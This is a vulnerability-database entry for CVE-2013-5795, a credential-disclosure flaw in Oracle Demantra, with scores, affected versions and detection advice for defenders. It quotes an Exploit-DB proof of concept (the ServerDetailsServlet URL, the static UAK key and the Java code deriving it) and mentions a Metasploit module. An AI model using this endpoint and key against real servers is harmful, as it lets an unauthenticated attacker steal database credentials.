CVE-2013-5795
published 2014-01-15CVE-2013-5795: Unspecified vulnerability in the Oracle Demantra Demand Management component in Oracle Supply Chain Products Suite 7.2.0.3 SQL-Server, 7.3.0, 7.3.1, 12.2.1…
PriorityP351medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
59.49%
99.0th percentile
Unspecified vulnerability in the Oracle Demantra Demand Management component in Oracle Supply Chain Products Suite 7.2.0.3 SQL-Server, 7.3.0, 7.3.1, 12.2.1, 12.2.2, and 12.2.3 allows remote attackers to affect confidentiality via unknown vectors related to DM Others.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | supply_chain_products_suite | — | — |
| oracle | supply_chain_products_suite_sql-server | — | — |
| oracle | supply_chain_products_suite_sql-server | — | — |
| oracle | supply_chain_products_suite_sql-server | — | — |
| oracle | supply_chain_products_suite_sql-server | — | — |
| oracle | supply_chain_products_suite_sql-server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests to /demantra/ServerDetailsServlet with a UAK query parameter — this endpoint leaks database credentials to unauthenticated callers. ↗
- →The static UAK key value 406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1 is computed deterministically from hardcoded seed 'er6Us8wB' — alert on any request containing this exact value in the UAK parameter. ↗
- →The exploit is usable by unauthenticated remote attackers; look for unauthenticated GET requests to ServerDetailsServlet in web/application server logs. ↗
- ·The UAK key is computed statically from the hardcoded seed string 'er6Us8wB' using SHA-256; it does not change between deployments, making the attack fully reproducible against any unpatched instance. ↗
- ·Affected versions span multiple SQL-Server and non-SQL-Server builds (7.2.0.3, 7.3.0, 7.3.1, 12.2.1, 12.2.2, 12.2.3); the Metasploit module specifically targets 12.2.1 but the credential-leak endpoint is present across all listed versions. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Oracle Demantra 12.2.1 - Database Credentials Disclosure
exploitdb·2014-03-01
CVE-2013-5795 Oracle Demantra 12.2.1 - Database Credentials Disclosure
Oracle Demantra 12.2.1 - Database Credentials Disclosure
---
Details:
Demantra has a backend function that allows anyone to retrieve the database instance name and the corresponding credentials.
Impact:
A remote, unauthenticated attacker could exploit this issue in combination with other found issues, to extract the database credentials and instance name.
Exploit:
The target URL is:
http://target.com:8080/demantra/ServerDetailsServlet?UAK=
Now the UAK key is calculated statically:
String encryptedPassword = new String(CryptographicService.encodeHashStringHex("er6Us8wB", "SHA-256"));
StringBuffer tmp = new StringBuffer("sge");
tmp.append(0);
tmp.append(encryptedPassword);
uak = new String(CryptographicService.encodeHashStringHex(tmp.toString(), "SHA-256"));
From that information
Metasploit
Oracle Demantra Database Credentials Leak
metasploit
Oracle Demantra Database Credentials Leak
Oracle Demantra Database Credentials Leak
This module exploits a database credentials leak found in Oracle Demantra 12.2.1 in combination with an authentication bypass. This way an unauthenticated user can retrieve the database name, username and password on any vulnerable machine.
No writeups or analysis indexed.
http://osvdb.org/102096http://secunia.com/advisories/56474http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.htmlhttp://www.securityfocus.com/bid/64758http://www.securityfocus.com/bid/64846http://www.securitytracker.com/id/1029620http://osvdb.org/102096http://secunia.com/advisories/56474http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.htmlhttp://www.securityfocus.com/bid/64758http://www.securityfocus.com/bid/64846http://www.securitytracker.com/id/1029620
2014-01-15
Published